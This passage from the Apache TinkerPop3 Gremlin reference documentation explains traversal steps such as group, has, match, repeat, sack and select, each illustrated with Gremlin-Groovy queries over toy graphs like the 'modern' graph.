a traversal, sideEffect computations are sometimes required. That is, the actual path taken or the current location of a traverser is not the ultimate output of the computation, but some other representation of the traversal. The `group()`-step (*sideEffect*) is one such sideEffect that organizes the objects according to some function of the object. Then, if required, that organization (a list) is reduced. An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(label) <1>\ng.V().group().by(label).by('name') <2>\ng.V().group().by(label).by('name').by(count(local)) <3>\n----\n\n<1> Group the vertices by their label.\n<2> For each vertex in the group, get their name.\n<3> For each grouping, what is its size?\n\nThe three projection parameters available to `group()` via `by()` are:\n\n. Key-projection: What feature of the object to group on (a function that yields the map key)?\n. Value-projection: What feature of the group to store in the key-list?\n. Reduce-projection: What feature of the key-list to ultimately return?\n\nWARNING: The `group()`-step does not have a correlate in <<traversalvertexprogram,Gremlin OLAP>> when used mid-traversal. When in mid-traversal, grouping only occurs at the current processing vertex and thus, is not a global operation as it is in Gremlin OLTP. However, `GroupMapReduce` provides unified groups at the end of the traversal computation.\n\n[[groupcount-step]]\nGroupCount Step\n~~~~~~~~~~~~~~~\n\nWhen it is important to know how many times a particular object has been at a particular part of a traversal, `groupCount()`-step (*sideEffect*) is used.\n\n\t\"What is the distribution of ages in the graph?\"\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').values('age').groupCount()\ng.V().hasLabel('person').groupCount().by('age') <1>\n----\n\n<1> You can also supply a pre-group projection, where the provided <<by-step,`by()`>>-modulation determines what to group the incoming object by.\n\nThere is one person that is 32, one person that is 35, one person that is 27, and one person that is 29.\n\n\t\"Iteratively walk the graph and count the number of times you see each vertex label.\"\n\nimage::groupcount-step.png[width=420]\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m').by(label)).times(10).cap('m')\n----\n\nThe above is interesting in that it demonstrates the use of referencing the internal `Map<Object,Long>` of `groupCount()` with a string variable. 
Given that `groupCount()` is a sideEffect-step, it simply passes the object it received to its output. Internal to `groupCount()`, the object's count is incremented.\n\nWARNING: The `groupCount()`-step does not have a correlate in <<traversalvertexprogram,Gremlin OLAP>> when used mid-traversal. When in mid-traversal, grouping only occurs at the current processing vertex and thus, is not a global operation as it is in Gremlin OLTP. However, `GroupCountMapReduce` provides unified groups at the end of the traversal computation.\n\n[[has-step]]\nHas Step\n~~~~~~~~\n\nimage::has-step.png[width=670]\n\nIt is possible to filter vertices, edges, and vertex properties based on their properties using `has()`-step (*filter*). There are numerous variations on `has()` including:\n\n * `has(key,value)`: Remove the traverser if its element does not have the provided key\/value property.\n * `has(key,predicate)`: Remove the traverser if its element does not have a key value that satisfies the bi-predicate.\n * `hasLabel(labels...)`: Remove the traverser if its element does not have any of the labels.\n * `hasId(ids...)`: Remove the traverser if its element does not have any of the ids.\n * `hasKey(keys...)`: Remove the traverser if its property does not have any of the keys.\n * `hasValue(values...)`: Remove the traverser if its property does not have any of the values.\n * `has(key)`: Remove the traverser if its element does not have a value for the key.\n * `hasNot(key)`: Remove the traverser if its element has a value for the key.\n * `has(traversal)`: Remove the traverser if its object does not yield a result through the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person')\ng.V().hasLabel('person').out().has('name',within('vadas','josh'))\ng.V().hasLabel('person').out().has('name',within('vadas','josh')).\n outE().hasLabel('created')\ng.V().has('age',inside(20,30)).values('age') <1>\ng.V().has('age',outside(20,30)).values('age') <2>\n----\n\n<1> Find all vertices whose ages are between 20 (inclusive) and 30 (exclusive).\n<2> Find all vertices whose ages are not between 20 (inclusive) and 30 (exclusive).\n\nIt is also possible to filter any arbitrary object based on an anonymous traversal yielding at least one result.\n\n[gremlin-groovy,modern]\n----\ng.V().has(out('created')).values('name') <1>\ng.V().out('knows').has(out('created')).values('name') <2>\ng.V().has(out('created').count().is(gte(2L))).values('name') <3>\ng.V().has(out('knows').has(out('created'))).values('name') <4>\n----\n\n<1> What are the names of the people who have created a project?\n<2> What are the names of the people that are known by someone and have created a project?\n<3> What are the names of the people who have created two or more projects?\n<4> What are the names of the people who know someone that has created a project? (This only works in OLTP -- see the `WARNING` below)\n\nWARNING: The anonymous traversal of `has()` processes the current object \"locally\". In OLAP, where the atomic unit of computing is the vertex and its local \"star graph,\" it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.\n\n[[inject-step]]\nInject Step\n~~~~~~~~~~~\n\nimage::inject-step.png[width=800]\n\nOne of the major features of TinkerPop3 is \"injectable steps.\" This makes it possible to insert objects arbitrarily into a traversal stream. 
In general, `inject()`-step (*sideEffect*) exists and a few examples are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(4).out().values('name').inject('daniel')\ng.V(4).out().values('name').inject('daniel').map {it.get().length()}\ng.V(4).out().values('name').inject('daniel').map {it.get().length()}.path()\n----\n\nIn the last example above, note that the path starting with `daniel` is only of length 2. This is because the `daniel` string was inserted half-way in the traversal. Finally, a typical use case is provided below -- when the start of the traversal is not a graph object.\n\n[gremlin-groovy,modern]\n----\ninject(1,2)\ninject(1,2).map {it.get() + 1}\ninject(1,2).map {it.get() + 1}.map {g.V(it.get()).next()}.values('name')\n----\n\n[[is-step]]\nIs Step\n~~~~~~~\n\nIt is possible to filter scalar values using `is()`-step (*filter*).\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').is(32)\ng.V().values('age').is(lte(30))\ng.V().values('age').is(inside(30, 40))\ng.V().has(__.in('created').count().is(1l)).values('name') <1>\ng.V().has(__.in('created').count().is(gte(2l))).values('name') <2>\ng.V().has(__.in('created').values('age').\n mean().is(inside(30d, 35d))).values('name') <3>\n----\n\n<1> Find projects having exactly one contributor.\n<2> Find projects having two or more contributors.\n<3> Find projects whose contributors' average age is between 30 and 35.\n\n[[limit-step]]\nLimit Step\n~~~~~~~~~~\n\nThe `limit()`-step is analogous to <<range-step,`range()`-step>> save that the lower end range is set to 0.\n\n[gremlin-groovy,modern]\n----\ng.V().limit(2)\ng.V().range(0, 2)\ng.V().limit(2).toString()\n----\n\n[[local-step]]\nLocal Step\n~~~~~~~~~~\n\nimage::local-step.png[width=450]\n\nA `GraphTraversal` operates on a continuous stream of objects. In many situations, it is important to operate on a single element within that stream. To do such object-local traversal computations, `local()`-step exists (*branch*). Note that the examples below use the <<the-crew-toy-graph,The Crew>> toy data set.\n\n[gremlin-groovy,theCrew]\n----\ng.V().as('person').\n properties('location').order().by('startTime',incr).limit(2).\n value().as('location').select().by('name').by() <1>\ng.V().as('person').\n local(properties('location').order().by('startTime',incr).limit(2)).\n value().as('location').select().by('name').by() <2>\n----\n\n<1> Get the first two people and their respective location according to the most historic location start time.\n<2> For every person, get their two most historic locations.\n\nThe two traversals above look nearly identical save the inclusion of `local()` which wraps a section of the traversal in an object-local traversal. As such, the `order().by()` and the `limit()` refer to a particular object, not to the stream as a whole.\n\nWARNING: The anonymous traversal of `local()` processes the current object \"locally.\" In OLAP, where the atomic unit of computing is the vertex and its local \"star graph,\" it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.\n
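\nThe same local-versus-global distinction can be illustrated on the modern toy graph with a simple count (an illustrative sketch):\n\n[gremlin-groovy,modern]\n----\ng.V().outE('created').count() <1>\ng.V().local(outE('created').count()) <2>\n----\n\n<1> One global count over the entire stream.\n<2> One count per vertex, computed object-locally.\n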
\n[[match-step]]\nMatch Step\n~~~~~~~~~~\n\nThe `match()`-step (*map*) is introduced into TinkerPop3 to support a more link:http:\/\/en.wikipedia.org\/wiki\/Declarative_programming[declarative] form of link:http:\/\/en.wikipedia.org\/wiki\/Pattern_matching[pattern matching]. Similar constructs were available in previous TinkerPop versions via the `table()`-step, but that has since been removed in favor of the `match().select()`-pattern. With MatchStep in TinkerPop, a query optimizer similar to the link:http:\/\/www.knowledgefrominformation.com\/2011\/04\/16\/budget-match-cost-effective-subgraph-matching-on-large-networks\/[budget match algorithm] builds and revises query plans on the fly, while a query is in progress. For very large graphs, where the developer is uncertain of the statistics of the graph (e.g. how many `knows`-edges vs. `worksFor`-edges exist in the graph), it is advantageous to use `match()`, as an optimal plan will be determined automatically. Furthermore, some queries are much easier to express via `match()` than with single-path traversals.\n\n\t\"Who created a project named 'lop' that was also created by someone who is 29 years old? Return the two creators.\"\n\nimage::match-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').as('b'),\n __.as('b').has('name', 'lop'),\n __.as('b').in('created').as('c'),\n __.as('c').has('age', 29)).select('a','c').by('name')\n----\n\nNote that the above can also be more concisely written as below, which demonstrates that imperative inner-traversals can be arbitrarily defined.\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').has('name', 'lop').as('b'),\n __.as('b').in('created').has('age', 29).as('c')).select('a','c').by('name')\n----\n\n[[grateful-dead]]\n.Grateful Dead\nimage::grateful-dead-schema.png[width=475]\n\nMatchStep brings functionality similar to link:http:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin. Like SPARQL, MatchStep conjoins a set of patterns applied to a graph. For example, the following traversal finds exactly those songs which Jerry Garcia has both sung and written (using the Grateful Dead graph distributed in the `data\/` directory): \n\n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\ng.V().match('a',\n __.as('a').has('name', 'Garcia'),\n __.as('a').in('writtenBy').as('b'),\n __.as('a').in('sungBy').as('b')).select('b').values('name')\n----\n\nAmong the features which differentiate `match()` from SPARQL are:\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').has('name','lop').as('b'), <1>\n __.as('b').in('created').has('age', 29).as('c'),\n __.as('c').repeat(out()).times(2)). <2>\n select('c').out('knows').dedup().values('name') <3>\n----\n\n<1> *Patterns of arbitrary complexity*: `match()` is not restricted to triple patterns or property paths.\n<2> *Recursion support*: `match()` supports the branch-based steps within a pattern, including `repeat()`.\n<3> *Imperative\/declarative hybrid*: Prior and subsequent to a `match()`, it is possible to leverage classic imperative Gremlin.\n\nTo extend point #3, it is possible to support going from imperative, to declarative, to imperative, ad infinitum.\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('knows').as('b'),\n __.as('b').out('created').has('name','lop')).\n select('b').out('created').\n match('a',\n __.as('a').in('created').as('b'),\n __.as('b').out('knows').as('c')).\n select('c').values('name')\n----\n\nLike all other steps in Gremlin, `match()` is a function and thus, `match()` within `match()` is a natural consequence of Gremlin's functional foundation (i.e. 
recursive matching).\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('knows').as('b'),\n __.as('b').out('created').has('name','lop'),\n __.as('b').match('x',\n __.as('x').out('created').as('y'),\n __.as('y').has('name','ripple')).\n select('y').as('c')).\n select('a','c').by('name')\n----\n\nWARNING: Currently, `match()` does not operate within a multi-JVM <<graphcomputer,GraphComputer>> OLAP environment. Future work includes a linearization <<traversalstrategy,TraversalStrategy>> for `match()`.\n\n[[using-where-with-match]]\nUsing Where with Match\n^^^^^^^^^^^^^^^^^^^^^^\n\nMatch is typically used in conjunction with both `select()` (demonstrated previously) and `where()` (presented here). A `where()` allows the user to further constrain the result set provided by `match()`.\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where('a', neq('c')).select('a','c').by('name')\n----\n\nThe `where()`-step can take either a `BiPredicate` (as in the example above) or a `Traversal` (as in the example below). Using `MatchWhereStrategy`, `where()`-clauses can be automatically folded into `match()` and thus, subject to the `match()`-step's budget-match algorithm.\n\n[gremlin-groovy,modern]\n----\ntraversal = g.V().match('a',\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where(__.as('a').out('knows').as('c')). <1>\n select('a','c').by('name'); null <2>\ntraversal.toString() <3>\ntraversal <4> <5>\ntraversal.toString() <6>\n----\n\n<1> A `where()`-step with a traversal containing variable bindings declared in `match()`.\n<2> A useful trick to ensure that the traversal is not iterated by the Gremlin Console.\n<3> The string representation of the traversal prior to its strategies being applied.\n<4> The Gremlin Console will automatically iterate anything that is an iterator or is iterable.\n<5> Both marko and josh are co-developers and marko knows josh.\n<6> The string representation of the traversal after the strategies have been applied (and thus, `where()` is folded into `match()`).\n\n[[max-step]]\nMax Step\n~~~~~~~~\n\nThe `max()`-step (*map*) operates on a stream of numbers and determines which is the largest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').max()\ng.V().repeat(both()).times(3).values('age').max()\n----\n\nIMPORTANT: `max(local)` determines the max of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a max of `Double.NaN` is returned.\n\n[[mean-step]]\nMean Step\n~~~~~~~~~\n\nThe `mean()`-step (*map*) operates on a stream of numbers and determines the average of those numbers.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').mean()\ng.V().repeat(both()).times(3).values('age').mean() <1>\ng.V().repeat(both()).times(3).values('age').dedup().mean()\n----\n\n<1> Realize that traversers are being bulked by `repeat()`. There may be more of a particular number than another, thus altering the average.\n\nIMPORTANT: `mean(local)` determines the mean of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. 
For any other object, a mean of `Double.NaN` is returned.\n\n[[min-step]]\nMin Step\n~~~~~~~~\n\nThe `min()`-step (*map*) operates on a stream of numbers and determines which is the smallest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').min()\ng.V().repeat(both()).times(3).values('age').min()\n----\n\nIMPORTANT: `min(local)` determines the min of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a min of `Double.NaN` is returned.\n\n[[or-step]]\nOr Step\n~~~~~~~\n\nThe `or()`-step ensures that at least one of the provided traversals yields a result (*filter*). Please see <<and-step,`and()`>> for and-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().or(\n __.outE('created'),\n __.inE('created').count().is(gt(1l))).\n values('name')\n----\n\nThe `or()`-step can take an arbitrary number of traversals. At least one of the traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. Though, with infix notation, only two traversals can be or'd together.\n\n[gremlin-groovy,modern]\n----\ng.V().has(outE('created').or().outE('knows')).values('name')\n----\n\n[[order-step]]\nOrder Step\n~~~~~~~~~~\n\nWhen the objects of the traversal stream need to be sorted, `order()`-step (*map*) can be leveraged.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name').order()\ng.V().values('name').order().by(decr)\ng.V().hasLabel('person').order().by('age', incr).values('name')\n----\n\nOne of the most traversed objects in a traversal is an `Element`. An element can have properties associated with it (i.e. key\/value pairs). In many situations, it is desirable to sort an element traversal stream according to a comparison of their properties.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name')\ng.V().order().by('name',incr).values('name')\ng.V().order().by('name',decr).values('name')\n----\n\nThe `order()`-step allows the user to provide an arbitrary number of comparators for primary, secondary, etc. sorting. In the example below, the primary ordering is based on the outgoing created-edge count. The secondary ordering is based on the age of the person.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').order().by(outE('created').count(), incr).\n by('age', incr).values('name')\ng.V().hasLabel('person').order().by(outE('created').count(), incr).\n by('age', decr).values('name')\n----\n\nRandomizing the order of the traversers at a particular point in the traversal is possible with `Order.shuffle`.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').order().by(shuffle)\ng.V().hasLabel('person').order().by(shuffle)\n----\n\nIMPORTANT: `order(local)` orders the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, the object is returned unchanged.\n\n[[path-step]]\nPath Step\n~~~~~~~~~\n\nA traverser is transformed as it moves through a series of steps within a traversal. 
The history of the traverser is realized by examining its path with `path()`-step (*map*).\n\nimage::path-step.png[width=650]\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().values('name')\ng.V().out().out().values('name').path()\n----\n\nIf edges are required in the path, then be sure to traverse those edges explicitly.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().inV().outE().inV().path()\n----\n\nIt is possible to post-process the elements of the path in a round-robin fashion via `by()`.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by('name').by('age')\n----\n\nFinally, because post-processing is `by()`-based, nothing prevents it from triggering yet another traversal. In the traversal below, for each element of the path traversed thus far, if it's a person (as determined by having an `age`-property), then get all of their creations, else if it's a creation, get all the people that created it.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by(\n choose(hasLabel('person'),\n out('created').values('name'),\n __.in('created').values('name')).fold())\n----\n\nWARNING: Generating path information is expensive as the history of the traverser is stored into a Java list. With numerous traversers, there are numerous lists. Moreover, in an OLAP <<graphcomputer,`GraphComputer`>> environment this becomes exceedingly prohibitive as there are traversers emanating from all vertices in the graph in parallel. In OLAP there are optimizations provided for traverser populations, but when paths are calculated (and each traverser is unique due to its history), then these optimizations are no longer possible.\n\n[[path-data-structure]]\nPath Data Structure\n^^^^^^^^^^^^^^^^^^^\n\nThe `Path` data structure is an ordered list of objects, where each object is associated to a `Set<String>` of labels. An example is presented below to demonstrate both the `Path` API as well as how a traversal yields labeled paths.\n\nimage::path-data-structure.png[width=350]\n\n[gremlin-groovy,modern]\n----\npath = g.V(1).as('a').has('name').as('b').\n out('knows').out('created').as('c').\n has('name','ripple').values('name').as('d').\n identity().as('e').path().next()\npath.size()\npath.objects()\npath.labels()\npath.a\npath.b\npath.c\npath.d == path.e\n----\n\n[[profile-step]]\nProfile Step\n~~~~~~~~~~~~\n\nThe `profile()`-step (*sideEffect*) exists to allow developers to profile their traversals to determine statistical information like step runtime, counts, etc.\n\nWARNING: Profiling a Traversal will impede the Traversal's performance. This overhead is mostly excluded from the profile results, but durations are not exact. Thus, durations are best considered in relation to each other.\n\n[gremlin-groovy,modern]\n----\ng.V().out('created').repeat(both()).times(3).hasLabel('person').values('age').sum().profile().cap(TraversalMetrics.METRICS_KEY)\n----\n\nThe `profile()`-step generates a `TraversalMetrics` sideEffect object that contains the following information:\n\n* `Step`: A step within the traversal being profiled.\n* `Count`: The number of _represented_ traversers that passed through the step.\n* `Traversers`: The number of traversers that passed through the step.\n* `Time (ms)`: The total time the step was actively executing its behavior.\n* `% Dur`: The percentage of total time spent in the step.\n\nimage:gremlin-exercise.png[width=120,float=left] It is important to understand the difference between `Count` and `Traversers`. 
Traversers can be merged and as such, when two traversers are \"the same\" they may be aggregated into a single traverser. That new traverser has a `Traverser.bulk()` that is the sum of the two merged traverser bulks. On the other hand, the `Count` represents the sum of all `Traverser.bulk()` results and thus, expresses the number of \"represented\" (not enumerated) traversers. `Traversers` will always be less than or equal to `Count`.\n\n[[range-step]]\nRange Step\n~~~~~~~~~~\n\nAs traversers propagate through the traversal, it is possible to only allow a certain number of them to pass through with `range()`-step (*filter*). When the low-end of the range is not met, objects continue to be iterated. When within the low (inclusive) and high (exclusive) range, traversers are emitted. Finally, when above the high range, the traversal breaks out of iteration.\n\n[gremlin-groovy,modern]\n----\ng.V().range(0,3)\ng.V().range(1,3)\ng.V().repeat(both()).times(1000000).emit().range(6,10)\n----\n\n[[repeat-step]]\nRepeat Step\n~~~~~~~~~~~\n\nimage::gremlin-fade.png[width=350]\n\nThe `repeat()`-step (*branch*) is used for looping over a traversal given some break predicate. Below are some examples of `repeat()`-step in action.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).path().by('name') <1>\ng.V().until(has('name','ripple')).\n repeat(out()).path().by('name') <2>\n----\n\n<1> do-while semantics stating to do `out()` 2 times.\n<2> while-do semantics stating to break if the traverser is at a vertex named \"ripple\".\n\nIMPORTANT: There are two modulators for `repeat()`: `until()` and `emit()`. If `until()` comes after `repeat()`, it is do\/while looping. If `until()` comes before `repeat()`, it is while\/do looping. If `emit()` is placed after `repeat()`, it is evaluated on the traversers leaving the repeat-traversal. If `emit()` is placed before `repeat()`, it is evaluated on the traversers prior to entering the repeat-traversal.\n\nThe `repeat()`-step also supports an \"emit predicate\", where the predicate for an empty argument `emit()` is true (i.e. `emit() == emit{true}`). With `emit()`, the traverser is split in two -- the traverser exits the code block as well as continues back within the code block (assuming `until()` holds true).\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name') <1>\ng.V(1).emit().repeat(out()).times(2).path().by('name') <2>\n----\n\n<1> The `emit()` comes after `repeat()` and thus, emission happens after the `repeat()` traversal is executed. Thus, no one-vertex paths exist.\n<2> The `emit()` comes before `repeat()` and thus, emission happens prior to the `repeat()` traversal being executed. Thus, one-vertex paths exist.\n\nThe `emit()`-modulator can take an arbitrary predicate.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit(has('lang')).path().by('name')\n----\n\nimage::repeat-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name')\n----\n\nThe first time through the `repeat()`, the vertices lop, vadas, and josh are seen. Given that `loops==0`, the traverser repeats. However, because the emit-predicate is declared true, those vertices are emitted. At step 2 (`loops==1`), the vertices traversed are ripple and lop (Josh's created projects, as lop and vadas have no out edges) and are also emitted. Now `loops==1` so the traverser repeats. As ripple and lop have no out edges, there are no vertices to traverse. 
Given that `loops==2`, the until-predicate fails. Therefore, the traverser has seen the vertices: lop, vadas, josh, ripple, and lop.\n\nFinally, note that both `emit()` and `until()` can take a traversal and, in such situations, the predicate is determined by `traversal.hasNext()`. A few examples are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).until(hasLabel('software')).path().by('name') <1>\ng.V(1).emit(hasLabel('person')).repeat(out()).path().by('name') <2>\ng.V(1).repeat(out()).until(outE().count().is(0L)).path().by('name') <3>\n----\n\n<1> Starting from vertex 1, keep taking outgoing edges until a software vertex is reached.\n<2> Starting from vertex 1, and in an infinite loop, emit the vertex if it is a person and then traverse the outgoing edges.\n<3> Starting from vertex 1, keep taking outgoing edges until a vertex is reached that has no more outgoing edges.\n\nWARNING: The anonymous traversals of `emit()` and `until()` (not `repeat()`) process their current objects \"locally.\" In OLAP, where the atomic unit of computing is the vertex and its local \"star graph,\" it is important that the anonymous traversals do not leave the confines of the vertex's star graph. In other words, they cannot traverse to an adjacent vertex's properties or edges.\n\n[[sack-step]]\nSack Step\n~~~~~~~~~\n\nimage:gremlin-sacks-running.png[width=175,float=right] A traverser can contain a local data structure called a \"sack\". The `sack()`-step is used to read and write sacks (*sideEffect* or *map*). Each sack of each traverser is created when using `GraphTraversal.withSack(initialValueSupplier,splitOperator?)`.\n\n* *Initial value supplier*: A `Supplier` providing the initial value of each traverser's sack.\n* *Split operator*: A `UnaryOperator` that clones the traverser's sack when the traverser splits. If no split operator is provided, then `UnaryOperator.identity()` is assumed.\n\nTwo trivial examples are presented below to demonstrate the *initial value supplier*. In the first example below, a traverser is created at each vertex in the graph (`g.V()`), with a 1.0 sack (`withSack(1.0f)`), and then the sack value is accessed (`sack()`). In the second example, a random float supplier is used to generate sack values.\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f).V().sack()\nrand = new Random()\ng.withSack {rand.nextFloat()}.V().sack()\n----\n\nA more complicated initial value supplier example is presented below where the sack values are used in a running computation and then emitted at the end of the traversal. When an edge is traversed, the edge weight is multiplied by the sack value (`sack(mult,'weight')`).\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f).V().repeat(outE().sack(mult,'weight').inV()).times(2)\ng.withSack(1.0f).V().repeat(outE().sack(mult,'weight').inV()).times(2).sack()\ng.withSack(1.0f).V().repeat(outE().sack(mult,'weight').inV()).times(2).path().\n by().by('weight')\n----\n\nimage:gremlin-sacks-standing.png[width=100,float=left] When complex objects are used (i.e. non-primitives), then a *split operator* should be defined to ensure that each traverser gets a clone of its parent's sack. The first example does not use a split operator and as such, the same map is propagated to all traversers (a global data structure). 
The second example demonstrates how `Map.clone()` ensures that each traverser contains a unique, local sack.\n\n[gremlin-groovy,modern]\n----\ng.withSack {[:]}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ BAD: single map\ng.withSack {[:]}{it.clone()}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ GOOD: cloned map\n----\n\nNOTE: For primitives (i.e. integers, longs, floats, etc.), a split operator is not required as primitives are encoded in the memory address of the sack, not as a reference to an object.\n\n[[sample-step]]\nSample Step\n~~~~~~~~~~~\n\nThe `sample()`-step is useful for sampling some number of the traversers previously seen in the traversal stream.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().sample(1).values('weight')\ng.V().outE().sample(1).by('weight').values('weight')\ng.V().outE().sample(2).by('weight').values('weight')\n----\n\nOne of the more interesting use cases for `sample()` is when it is used in conjunction with <<local-step,`local()`>>. The combination of the two steps supports the execution of link:http:\/\/en.wikipedia.org\/wiki\/Random_walk[random walks]. In the example below, the traversal starts at vertex 1 and selects one edge to traverse based on a probability distribution generated by the weights of the edges. The output is always a single path because, by selecting a single edge, the traverser never splits and thus continues down a single path in the graph.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5)\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5).path()\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(10).path()\n----\n\n[[select-step]]\nSelect Step\n~~~~~~~~~~~\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Functional_programming[Functional languages] make use of function composition and lazy evaluation to create complex computations from primitive operations. This is exactly what `Traversal` does. One of the differentiating aspects of Gremlin's data flow approach to graph processing is that the flow need not always go \"forward,\" but in fact, can go back to a previously seen area of computation. Examples include <<path-step,`path()`>> as well as the `select()`-step (*map*). There are two general ways to use `select()`-step.\n\n. Select labeled steps within a path (as defined by `as()` in a traversal).\n. Select objects out of a `Map<String,Object>` flow (i.e. a sub-map).\n\nThe first use case is demonstrated via example below.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b').out().as('c') \/\/ no select\ng.V().as('a').out().as('b').out().as('c').select()\ng.V().as('a').out().as('b').out().as('c').select('a','b')\ng.V().as('a').out().as('b').out().as('c').select('a','b').by('name')\ng.V().as('a').out().as('b').out().as('c').select('a') <1>\n----\n\n<1> If the selection is one step, no map is returned.\n\nWhen there is only one label selected, then a single object is returned. This is useful for stepping back in a computation and easily moving forward again on the object reverted to.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out()\ng.V().out().out().path()\ng.V().as('x').out().out().select('x')\ng.V().out().as('x').out().select('x')\ng.V().out().out().as('x').select('x') \/\/ pointless\n----\n\nThe second use case is best understood in terms of <<match-step,`match()`>>-step where the result of `match()` is a `Map<String,Object>` of variable bindings. 
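For example, selecting from the map of bindings that `match()` emits (a minimal sketch over the modern toy graph, mirroring the `match()`-examples above):\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').as('b')).select('a','b').by('name')\n----\n\n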
However, any step that emits a `Map<String,Object>` can be selected. A contrived example is presented below.\n\n[gremlin-groovy,modern]\n----\ng.V().range(0, 2).as('a').map {[b:1,c:2]} <1>\ng.V().range(0, 2).as('a').map {[b:1,c:2]}.select(local) <2>\ng.V().range(0, 2).as('a').map {[b:1,c:2]}.select(local,'a','c') <3>\ng.V().range(0, 2).as('a').map {[b:1,c:2]}.select(local,'c') <4>\n----\n\n<1> A contrived example to create a `Map<String,Object>` flow as a foundation for the examples to follow.\n<2> Select will grab both labeled steps and `Map<String,Object>` entries.\n<3> The same `List<String>` selectivity can be used as demonstrated in the previous example.\n<4> If a single selection is used, then the object is emitted, not wrapped in a map. This is useful for continuing the traversal process without having to do a map projection.\n\nNOTE: When executing a traversal with `select()` on a standard traversal engine (i.e. OLTP), `select()` will do its best to avoid calculating the path history and instead, will rely on a global data structure for storing the currently selected object. As such, if only a subset of the path walked is required, `select()` should be used over the more resource-intensive <<path-step,`path()`>>-step.\n\n[[using-where-with-select]]\nUsing Where with Select\n^^^^^^^^^^^^^^^^^^^^^^^\n\nFinally, like <<match-step,`match()`>>-step, it is possible to use `where()`, as `where()` is a filter that processes `Map<String,Object>` streams.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').in('created').as('b').select().by('name') <1>\ng.V().as('a').out('created').in('created').as('b').\n select().by('name').where('a',neq('b')) <2>\ng.V().as('a').out('created').in('created').as('b').\n select(). <3>\n where('a',neq('b')).\n where(__.as('a').out('knows').as('b')).\n select().by('name')\n----\n\n<1> A standard `select()` that generates a `Map<String,Object>` of variable bindings in the path (i.e. `a` and `b`) for the sake of a running example.\n<2> The `select().by('name')` projects each bound vertex to its name property value and `where()` ensures that the respective `a` and `b` strings are not the same.\n<3> The first `select()` projects a vertex binding set. A binding is filtered if `a` vertex equals `b` vertex. A binding is filtered if `a` doesn't know `b`. The second and final `select()` projects the name of the vertices.\n\n[[simplepath-step]]\nSimplePath Step\n~~~~~~~~~~~~~~~\n\nimage::simplepath-step.png[width=400]\n\nWhen it is important that a traverser not repeat its path through the graph, `simplePath()`-step should be used (*filter*). The <<path-data-structure,path>> information of the traverser is analyzed and if the path has repeated objects in it, the traverser is filtered. If cyclic behavior is desired, see <<cyclicpath-step,`cyclicPath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().simplePath()\ng.V(1).both().both().simplePath().path()\n----\n\n[[store-step]]\nStore Step\n~~~~~~~~~~\n\nWhen link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy] aggregation is needed, `store()`-step (*sideEffect*) should be used over <<aggregate-step,`aggregate()`>>. 
